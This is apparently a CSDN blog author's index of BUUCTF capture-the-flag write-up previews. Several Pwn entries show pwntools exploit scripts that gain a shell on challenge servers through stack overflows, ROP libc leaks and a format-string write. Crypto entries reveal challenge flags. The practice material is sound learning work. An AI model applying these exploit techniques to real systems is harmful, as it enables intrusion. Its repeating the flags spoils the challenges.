![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
餐桌上的猫
这个作者很懒,什么都没留下…
展开
-
BUUCTF-Pwn-ciscn_2019_es_2
题目截图例行检查原创 2022-04-04 17:02:46 · 420 阅读 · 0 评论 -
BUUCTF-Pwn-pwn2_sctf_2016
expfrom pwn import*from LibcSearcher import *elf=ELF('/home/lhb/桌面/pwn2_sctf_2016')p=remote('node4.buuoj.cn',27385) printf_plt=elf.plt['printf']printf_got=elf.got['printf']main=0x80485b8p.sendlineafter(b'read? ',b'-1')payload=b'a'*(0x2c+4)+p32(p原创 2022-03-25 23:32:31 · 200 阅读 · 0 评论 -
BUUCTF-Pwn-bjdctf_2020_babystack2
expfrom pwn import*p=remote('node4.buuoj.cn',26509) backdoor=0x0400726ret=0x40073ap.sendlineafter(b'name:\n',b'-1')payload=b'a'*(0x10+8)+p64(ret)+p64(backdoor)p.sendlineafter(b'name?\n',payload)p.interactive()原创 2022-03-25 22:40:06 · 128 阅读 · 0 评论 -
BUUCTF-Pwn-jarvisoj_fm
expfrom pwn import*p=remote('node4.buuoj.cn',27346) x_addr=0x804A02Cpayload=p32(x_addr)+b'%11$n'p.sendline(payload)p.interactive()原创 2022-03-25 21:35:17 · 2662 阅读 · 0 评论 -
BUUCTF-Pwn-bjdctf_2020_babyrop
expfrom pwn import*from LibcSearcher import *p=process('/home/lhb/桌面/bjdctf_2020_babyrop')elf=ELF('/home/lhb/桌面/bjdctf_2020_babyrop')p=remote('node4.buuoj.cn',27346) main=0x4006adpop_rdi_ret=0x400733puts_plt=elf.plt['puts']puts_got=elf.got['puts']原创 2022-03-25 21:18:18 · 359 阅读 · 0 评论 -
BUUCTF-Pwn-铁人三项(第五赛区)_2018_rop
expfrom pwn import*from LibcSearcher import *elf=ELF('/home/lhb/桌面/2018_rop')p=remote('node4.buuoj.cn',26218) main=0x80484C6write_plt=elf.plt['write']write_got=elf.got['write']payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p3原创 2022-03-25 21:08:57 · 108 阅读 · 0 评论 -
BUUCTF-Pwn-ciscn_2019_ne_5
expfrom pwn import*elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5')p=remote('node4.buuoj.cn',28555) str_sh=0x80482EAsystem_plt=elf.plt['system']p.sendline(b'administrator')p.sendline(b'1')payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh)p.sendline(原创 2022-03-25 10:36:10 · 124 阅读 · 0 评论 -
BUUCTF-Pwn-not_the_same_3dsctf_2016
题目截图原创 2022-03-04 14:24:55 · 95 阅读 · 1 评论 -
BUUCTF-Pwn-ciscn_2019_en_2
题目截图原创 2022-03-04 13:35:41 · 119 阅读 · 0 评论 -
BUUCTF-Pwn-bjdctf_2020_babystack
题目截图原创 2022-03-04 13:07:39 · 104 阅读 · 0 评论 -
BUUCTF-Pwn-get_started_3dsctf_2016
题目截图原创 2022-03-04 12:35:55 · 144 阅读 · 0 评论 -
BUUCTF-Reverse-easyre
题目截图用IDA打开按shift+F12查找字符串找到flag原创 2022-02-24 15:12:52 · 161 阅读 · 0 评论 -
BUUCTF-Crypto-变异凯撒
题目截图附件截图从格式可以知道afZ_表示的是flagf-a=102-97=5l-f=108-102=6a-Z=97-90=7g-_=103-95=8所以明文与密文之间的偏移是从5开始依次加一解密得flag为flag{Caesar_variation}原创 2022-02-22 10:26:34 · 147 阅读 · 0 评论 -
BUUCTF-Crypto-password
题目截图附件截图根据姓名和生日构造密码,从key的格式可以知道密码的长度为10位,生日19900315加上张三拼音的缩写zs刚好10位,尝试不同的大小写和排列组合得到flag为flag{zs19900315}原创 2022-02-22 10:04:37 · 1033 阅读 · 0 评论 -
BUUCTF-Crypto-看我回旋踢
题目截图附件截图猜想synt应该对应flag,可能是凯撒密码在线解密原创 2022-02-22 09:52:43 · 206 阅读 · 0 评论 -
BUUCTF-Crypto-Url编码
题目截图附件截图在线解码得到flagurl的编码规则可以百度原创 2022-02-22 09:42:16 · 149 阅读 · 0 评论 -
BUUCTF-Pwn-[OGeek2019]babyrop
题目截图检查文件信息开启了NX和Full RELOR用IDA打开,反汇编查看主函数查看函数sub_804871Fbuf[7]的大小为7个字节,而我们最多可以写入0x20个字节的数据,可以覆盖到v5,所以我们可以控制v5的值,在if判断中,如果buf中的字符串与s中的字符串不相同就会退出程序,但是v1控制strncmp函数比较的字符数,v1等于buf中字符串的长度,只要我们输入的数据以\0开始,v1就等于0,那么就可以绕过if判断查看函数sub_80487D0a1的值等于上一个函数中的原创 2022-02-16 16:19:18 · 2158 阅读 · 0 评论 -
BUUCTF-Pwn-jarvisoj_level2
题目截图检查文件信息,开启了NX用IDA打开查看字符串,存在/bin/sh,检查交叉引用发现并没有被使用查看函数表存在system函数进入主函数反汇编查看进入函数vulnerable_function()查看,发现存在栈溢出漏洞,就可以利用现有system函数和/bin/sh字符串getshellexpfrom pwn import*r=remote('node4.buuoj.cn',28083) str_bin_sh=0x804a024call_system=0x8048原创 2022-02-15 12:13:09 · 2318 阅读 · 0 评论 -
BUUCTF-Pwn-ciscn_2019_n_8
题目截图检查文件信息,开了NX,Canary和PIE反汇编查看主函数,只要var[13]=17就可以getshell,值得注意的是使用了(_QWORD *)进行类型转换,所以比较时读取的是QWORD即4个字的数据,也就是8个字节expfrom pwn import*r=remote('node4.buuoj.cn',28850) payload=p32(1)*13+p64(17)r.sendlineafter(b'\n', payload)r.interactive() #开启交互原创 2022-02-15 10:12:20 · 251 阅读 · 0 评论 -
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
题目截图检查文件信息这是一个32位的程序,开启了NX和Canary用IDA打开查看找到来能getshell的代码反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell测试我们输入的内容在栈中的位置,是第10个expfrom pwn import*r=remote('node4.buuoj.cn',28850) addr=原创 2022-02-15 09:31:37 · 350 阅读 · 0 评论 -
BUUCTF-Pwn-ciscn_2019_c_1
题目截图检查一下文件信息开启了NX,64位的文件使用IDA打开按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串一番寻找也没有找到system函数查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手找到gets函数所在位置查看在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用双击进入查看调用函数运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码原创 2022-02-14 19:30:57 · 3551 阅读 · 2 评论 -
BUUCTF-Pwn-jarvisoj_level0
题目截图panyload=b’b’*(0x80+8)+p64(0x400596)原创 2022-02-12 14:15:35 · 330 阅读 · 0 评论 -
BUUCTF-Pwn-ciscn_2019_n_1
题目截图原创 2022-02-12 14:04:41 · 238 阅读 · 0 评论 -
BUUTF-Pwn-warmup_csaw_2016
题目截图原创 2022-02-12 13:53:05 · 403 阅读 · 0 评论 -
BUUCTF-Pwn-rip
题目截图使用IDA打开附件,反汇编为C语言找到两个函数可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问题,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186所以我们可以构造payload=‘a’*23+原创 2021-11-14 16:23:34 · 2794 阅读 · 0 评论 -
BUUCTF-Crypto-摩丝
题目截图附件截图摩斯密码,使用在线工具解密解密网站:http://www.all-tool.cn/Tools/morse/?&rand=a6fe165940aeafb30e8e9ba53544f649原创 2021-10-31 15:57:48 · 333 阅读 · 0 评论 -
BUUCTF-Crypto-一眼就解密
题目截图从题目可以看出使用了base64加密使用在线工具解密解密网站:https://base64.us/原创 2021-10-31 15:44:34 · 87 阅读 · 0 评论 -
BUUCTF-Crypto-MD5
题目截图附件截图使用在线工具解密解密网站:https://www.cmd5.com/原创 2021-10-31 15:34:12 · 121 阅读 · 0 评论 -
BUUCTF-Pwn-test_your_nc
题目截图从题目描述可以看出,要使用要nc(netcat)命令先了解一下netcat命令是什么官网:http://netcat.sourceforge.net/netcat是一款调试 TCP/UDP 网络连接的利器,常被称作网络调试的瑞士军刀nc 有以下功能:模拟 TCP 服务端模拟 TCP 客户端模拟 UDP 服务端模拟 UDP 客户端模拟 UNIX socket 服务端模拟 UNIX socket 客户端端口扫描传输文件将服务器 bash 暴露给远程客户端内网穿透,反向获取原创 2021-10-31 15:20:39 · 717 阅读 · 0 评论